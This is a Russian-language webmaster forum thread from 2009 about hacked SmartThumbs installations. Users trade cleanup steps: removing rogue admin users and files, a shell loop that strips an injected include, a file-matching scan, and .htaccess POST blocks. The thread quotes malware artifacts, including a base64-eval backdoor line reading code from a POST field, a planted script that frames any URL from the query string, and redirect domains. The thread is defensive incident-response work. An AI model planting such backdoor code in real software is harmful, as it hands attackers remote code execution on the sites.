Реклама на сайте Advertise with us

SmartThumbs HACKED again

Расширенный поиск по форуму
 
Новая тема Новая тема   
Автор
Поиск в теме:



С нами с 22.05.03
Сообщения: 1405
Рейтинг: 843

Ссылка на сообщениеДобавлено: 07/10/09 в 20:38       Ответить с цитатойцитата 

кратко:
заломаны сайты со смарттамбсом последних версий, трафик с уникальных айпи уходит по кликам на галеры через редиректные скрипты хуйзнает куда.

предварительное лечение:

settings-->users-> удаляем пустых юзеров
tools-->file check-> находим и удаляем лишние файлы (высвечены красным) - если у вас много архивных страниц - смотрите внимательно, там может быть всего один файл в директории
/thumbs/015/skfjdlkjfk.php - примерное название
/classes/sniffer_class.php
../gallery.php (вообще это родной файл, но ст на него ругается, возможно, файл изменен и отличается от оригинального)
../go.php - такое тоже может быть

смотрим файл
/st/admin/variables.php

в конце стоит
<?@include_once('/tmp/ases.tmp');?>

удаляем строчку вместе с содержимым директории /tmp/ (кроме конкретно нужных вещей, конечно)

ATX 1.3 - есть версия, что дырка может быть и там, но имхо это просто совпадение. Но. там тоже есть
Extra-->file check
внесите ваш айпишник в список доступа, это понижает шансы взлома.

далее детали и обсуждение
http://www.askdamagex.com/f2/smart-thumbs-new-hack-40055/

Последний раз редактировалось: fihorn (08/10/09 в 00:33), всего редактировалось 1 раз

0
 

worldtraffic.trade

С нами с 20.08.06
Сообщения: 2836
Рейтинг: 2309

Ссылка на сообщениеДобавлено: 07/10/09 в 22:07       Ответить с цитатойцитата 

спасибо, думаю что проблема в СТ так как у меня несколько копий и только одна обновлена до 5.75 и только в ней я нашел несколько дней подоозрительный фал (чисто случайно лазил в СТ и нажал чек файлы) типа такого /thumbs/015/skfjdlkjfk.php - примерное название удалил,
/classes/sniffer_class.php вот это тоже удалять? (я удалил)

трейд Teen, Mature
Качественные ссылки

0
 



С нами с 22.05.03
Сообщения: 1405
Рейтинг: 843

Ссылка на сообщениеДобавлено: 07/10/09 в 23:14       Ответить с цитатойцитата 

world-gay-sex писал:

/classes/sniffer_class.php вот это тоже удалять? (я удалил)


я тоже удалил, т.к. его не должно быть

народ не чешется вообще, я погляжу..
в треп что ли запостить..

0
 

Осень .... опять в школу ;-((

С нами с 01.05.04
Сообщения: 6518
Рейтинг: 3998

Ссылка на сообщениеДобавлено: 07/10/09 в 23:21       Ответить с цитатойцитата 

на 2 х сиджах нашол пустых юзеров... других файлов нет..

0
 



С нами с 22.05.03
Сообщения: 1405
Рейтинг: 843

Ссылка на сообщениеДобавлено: 07/10/09 в 23:23       Ответить с цитатойцитата 

обновил первый пост

Последний раз редактировалось: fihorn (08/10/09 в 00:35), всего редактировалось 1 раз

0
 



С нами с 04.05.06
Сообщения: 3180
Рейтинг: 1379

Ссылка на сообщениеДобавлено: 07/10/09 в 23:45       Ответить с цитатойцитата 

спасибо

0
 



С нами с 11.08.06
Сообщения: 939
Рейтинг: 849

Ссылка на сообщениеДобавлено: 07/10/09 в 23:55       Ответить с цитатойцитата 

А известно ли, allow/deny в htaccess админки в данном случае спасаёт, или хак делается мимо админки?

0
 



С нами с 10.10.07
Сообщения: 339
Рейтинг: 404

Ссылка на сообщениеДобавлено: 08/10/09 в 00:27       Ответить с цитатойцитата 

ТС, у тебя в .htpasswd файле были записи по тем юзерам, которых ты удалил через панель ST?

это важно

http://soft-com.biz/ - Администрирование серверов, 24/7 тех.поддержка и мониторинг.

0
 



С нами с 22.05.03
Сообщения: 1405
Рейтинг: 843

Ссылка на сообщениеДобавлено: 08/10/09 в 00:28       Ответить с цитатойцитата 

DG писал:
А известно ли, allow/deny в htaccess админки в данном случае спасаёт, или хак делается мимо админки?


ну там ведь админка как сделана.. если закрыть всю директорию ST под пароль - то обычные серферы будут получать запрос логина с паролем при клике на тумбу =)

а если конкретные файлы блокировать - возможно, может помочь, только я не знаю какие.

конкретно вот есть решение на закрытие ПОСТ-запросов на определенные файлы.
http://www.askdamagex.com/f2/smart-thumbs-new-hack-40055/index5.html#post384569

0
 



С нами с 22.05.03
Сообщения: 1405
Рейтинг: 843

Ссылка на сообщениеДобавлено: 08/10/09 в 00:32       Ответить с цитатойцитата 

Soft-Com писал:
ТС, у тебя в .htpasswd файле были записи по тем юзерам, которых ты удалил через панель ST?
это важно


вообще лично я сначала удалил, а уже потом посмотрел хтпассвд
но на аскдамаге писали, что таки да

там строчки выглядели примерно так

:3948asdf98df8(md5 hash here)
admin:fsfsdlfksldfk(md5 hash here)
admin2:dfasdfh98f(md5 hash here)

типа такого

0
 



С нами с 10.10.07
Сообщения: 339
Рейтинг: 404

Ссылка на сообщениеДобавлено: 08/10/09 в 01:29       Ответить с цитатойцитата 

люди, огромная просьба, кто нашол у себя такую херь - не удаляйте файлы из /thumbs/ директории, напишите плс мне в личку, а лучше в аську.

нужно для выяснения кода самого скрипта

http://soft-com.biz/ - Администрирование серверов, 24/7 тех.поддержка и мониторинг.

2
 



С нами с 10.10.07
Сообщения: 339
Рейтинг: 404

Ссылка на сообщениеДобавлено: 08/10/09 в 02:54       Ответить с цитатойцитата 

пока еще не разобрался, но после взлома на сервере присутвуют 2 части скрипта:
1. в /tmp/ - судя по всему скрипт редиректа посетителя на урл http://itrxx.com/fr.php
Код:

for i in `locate st/admin/variables.php`; do grep -H ases $i; if [ $? = 0 ]; then echo "found in $i"; sed -i 's/<?@include_once.*;?>//g' $i; fi; done


2. в контенте доменов - в нём закодированная сторка, которая и представляет собой код, судя по всему пхп-шелл.

для поиска 2й части скрипта рекомендую использовать такую конструкцию:

Код:

wget http://soft-com.biz/st_bd.txt -O /tmp/st_bd.php
cd DIR_WHERE_TO_SCAN
find ./ -name \*.php -exec diff -qs /tmp/st_bd.php {} \; | grep identical | awk '{print $4}'


в результате будет список файлов со скриптами, просьба их не удалять, напишите плс в аську.

http://soft-com.biz/st_bd.txt - код скрипта, проверенео - он везде одинаковый, выложил у себя для удобства.

Последний раз редактировалось: Soft-Com (08/10/09 в 04:08), всего редактировалось 1 раз

http://soft-com.biz/ - Администрирование серверов, 24/7 тех.поддержка и мониторинг.

5
 



С нами с 22.05.03
Сообщения: 1405
Рейтинг: 843

Ссылка на сообщениеДобавлено: 08/10/09 в 04:00       Ответить с цитатойцитата 

вот здесь вот уже кто-то сделал дезенд скрипту
http://www.askdamagex.com/f2/smart-thumbs-new-hack-40055/index4.html#post384528

там присутствует еще один домен
atrxx.com/fr.php

по поводу хтаксесса и возможной защиты - в директории /st/ создаете .htaccess
там пишете

<FilesMatch "^((st|flush)\.php)$">
<Limit POST>
order deny,allow
deny from all
</Limit>
</FilesMatch>

это запрещает все POST-запросы на пхп-шные файлы внутри этой директории.
я пробовал рецепт из ссылки выше, с более длинным хтаксессом - но он не заработал, потому что стили тоже стали блокироваться

и, по всей видимости, действительно необходимо делать поиск идентичных по размеру файлов, потому что скрипты могут быть так же замаскированы под гиф-жпеги.

так что грепом надо искать все файлы, а не только пхп..

0
 



С нами с 10.10.07
Сообщения: 339
Рейтинг: 404

Ссылка на сообщениеДобавлено: 08/10/09 в 04:09       Ответить с цитатойцитата 

дезенд до одного места без куки, я там же об этом написал

http://soft-com.biz/ - Администрирование серверов, 24/7 тех.поддержка и мониторинг.

1
 



С нами с 10.10.07
Сообщения: 339
Рейтинг: 404

Ссылка на сообщениеДобавлено: 08/10/09 в 04:17       Ответить с цитатойцитата 

по поводу такого хтаксеса - при синке тумб при использовании удалённого тумбового сервера часть функций работать не будет по определению.

а если посмотреть код самого flush.php то думаю еще дофига чего работать перестанет даже в самой админке смарта

http://soft-com.biz/ - Администрирование серверов, 24/7 тех.поддержка и мониторинг.

5
 



С нами с 22.05.03
Сообщения: 1405
Рейтинг: 843

Ссылка на сообщениеДобавлено: 08/10/09 в 04:26       Ответить с цитатойцитата 

Soft-Com писал:
по поводу такого хтаксеса - при синке тумб при использовании удалённого тумбового сервера часть функций работать не будет по определению.
а если посмотреть код самого flush.php то думаю еще дофига чего работать перестанет даже в самой админке смарта


очень своевременный комментарий, я уже понаставил хтаксессов..
а что делает файл flush.php?

0
 



С нами с 10.10.07
Сообщения: 339
Рейтинг: 404

Ссылка на сообщениеДобавлено: 08/10/09 в 04:43       Ответить с цитатойцитата 

много чего, от редактирования .htpasswd и добавления пользователя до работы с галерами

http://soft-com.biz/ - Администрирование серверов, 24/7 тех.поддержка и мониторинг.

0
 

пьяный мастер

С нами с 06.09.05
Сообщения: 11946
Рейтинг: 5837


Передовик Master-X (16.12.2006) Передовик Master-X (01.01.2007) Передовик Master-X (16.01.2007) Передовик Master-X (16.09.2020)
Ссылка на сообщениеДобавлено: 08/10/09 в 05:15       Ответить с цитатойцитата 

на двух ст удалил пустых юзереи... болше ничего подозрителного вроде нет.

0
 



С нами с 24.10.06
Сообщения: 169
Рейтинг: 147

Ссылка на сообщениеДобавлено: 08/10/09 в 10:00       Ответить с цитатойцитата 

Имею следующие симптомы на двух объединенных доменах:

domain#1.com - версия СТ 5.71
domaing#2.com - версия СТ 5.71

domaing#2.com является чайлдом для домена domain#1.com
Итак:

domain#1.com - есть пустой юзер и моя запись, в файле .htpasswd - так же присутствует моя запись и запись без юзернейма.
domain#2.com - _только_ пустой юзер в файле .htpasswd тоже только запись без юзернейма

показания "file check" (отбросив мои файлы) domain#1.com:
classes/php_class.php - unknown file
gallery.php - unknown file

оба файла с открытым кодом, не зазенденые. php_class.php - просто какой-то большой класс функций, причем с русскими комментариями. Откуда он там - хз. Содержание gallery.php:
Код:

<?
$g = getenv ("QUERY_STRING");
?>
<html>
<head>
<title></title>
<!-- frames -->
<frameset  rows="100,*">
    <frame name="" src="top.html" marginwidth="10" marginheight="10" scrolling="auto" frameborder="0">
    <frame name="" src="<?php echo $g; ?>" marginwidth="10" marginheight="10" scrolling="auto" frameborder="0">
</frameset>

</head>
</body>
</html>


а вот для домена domain#2.com (дочернего) список больше:
admin/autocrop.php - checksum does not match
admin/check.php - checksum does not match
admin/cron.php - checksum does not match
admin/edit_picture.php - checksum does not match
admin/edit_spot.php - checksum does not match
admin/rotator.php - checksum does not match
admin/services.php - checksum does not match
admin/sync.php - checksum does not match
admin/thumbscan.php - checksum does not match
admin/traffic_check.php - checksum does not match
admin/win_edit.php - checksum does not match
classes/antibot_class.php - checksum does not match
classes/CropImage.php - checksum does not match
classes/functions.php - checksum does not match
classes/htaccess_class.php - checksum does not match
classes/mail_class.php - checksum does not match
classes/mysql_class.php - checksum does not match
classes/rotator_class.php - checksum does not match
classes/scan_class.php - checksum does not match
submit/antibot.php - checksum does not match
submit/index.php - checksum does not match
admin/update/available_version.php - unknown file
admin/autocrop.php - unknown file
admin/check.php - unknown file
admin/cron.php - unknown file
admin/edit_picture.php - unknown file
admin/edit_spot.php - unknown file
admin/rotator.php - unknown file
admin/services.php - unknown file
admin/sync.php - unknown file
admin/thumbscan.php - unknown file
admin/traffic_check.php - unknown file
admin/win_edit.php - unknown file
classes/mysql.php - unknown file
classes/antibot_class.php - unknown file
classes/CropImage.php - unknown file
classes/functions.php - unknown file
classes/htaccess_class.php - unknown file
classes/mail_class.php - unknown file
classes/mysql_class.php - unknown file
classes/rotator_class.php - unknown file
classes/scan_class.php - unknown file
templates/index.php - unknown file
templates/archive.php - unknown file
templates/install.php - unknown file
submit/antibot.php - unknown file
submit/index.php - unknown file
gallery.php - unknown file
flush.php - unknown file

может это глюк проверки файлов для дочернего домена? т.к.
templates/index.php - это мой темплейт просто
но вот что такое: templates/install.php ??? не помню чтобы я такое туда клал. Файл зазенден.

Далее для обоих доменов присутствует в конце файла variables.php строка:

<?@include_once('/tmp/ases.tmp');?>
в директории /tmp/ (уже на самом сервере, т.е. не в папке /home/), так же присутствует ases.tmp - зазендин.

Вобщем как я понимаю, меня тоже поломали? Вопрос, что делать? :-) Ну не удалять же все файлы с domaing#2.com....
Пока ничего не трогал. Могу что-ниубдь "затестить".

ЗЫ: Кстати, есть еще два независимых домена на этом же сервере с версиями СТ 5.70 и 5.66 - на них симптомов не обнаружено.

0
 



С нами с 16.07.04
Сообщения: 678
Рейтинг: 702

Ссылка на сообщениеДобавлено: 08/10/09 в 10:16       Ответить с цитатойцитата 

variables.php содержит еще строчку @eval(base64_decode($_POST[qxp]));//';
php_class.php это походу ПХП шелл

0
 



С нами с 10.10.07
Сообщения: 339
Рейтинг: 404

Ссылка на сообщениеДобавлено: 08/10/09 в 10:46       Ответить с цитатойцитата 

дайте файлы плс посмотреть

как я написал на askdamagex, часть которая инклюдится из variables.php - это код инклюда трояна, в зависмости от условий разный; всё что внутри директории ST - вебшелл.

но на русском вебшелла я еще не видел. (касаемо этого конкретного случая)

http://soft-com.biz/ - Администрирование серверов, 24/7 тех.поддержка и мониторинг.

0
 



С нами с 16.07.04
Сообщения: 678
Рейтинг: 702

Ссылка на сообщениеДобавлено: 08/10/09 в 11:01       Ответить с цитатойцитата 

0
 



С нами с 10.10.07
Сообщения: 339
Рейтинг: 404

Ссылка на сообщениеДобавлено: 08/10/09 в 11:12       Ответить с цитатойцитата 



спасибо, только логи бы к нему icon_sad.gif

http://soft-com.biz/ - Администрирование серверов, 24/7 тех.поддержка и мониторинг.

0
 



С нами с 24.10.06
Сообщения: 169
Рейтинг: 147

Ссылка на сообщениеДобавлено: 08/10/09 в 12:25       Ответить с цитатойцитата 

Вообще какое-то слабое обсуждение, честно говоря. Неужели тема мало кого интересует?..

0
 



С нами с 22.05.03
Сообщения: 1405
Рейтинг: 843

Ссылка на сообщениеДобавлено: 08/10/09 в 12:38       Ответить с цитатойцитата 

X-dream писал:
на двух ст удалил пустых юзереи... болше ничего подозрителного вроде нет.


посмотри admin/variables.php

tools->file check

0
 
Новая тема Новая тема   

Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте!


Перейти:  



Спонсор раздела Стань спонсором этого раздела!

Реклама на сайте Advertise with us

Опросы

Рецепт новогоднего блюда 2022



Обсудите на форуме обсудить (11)
все опросы »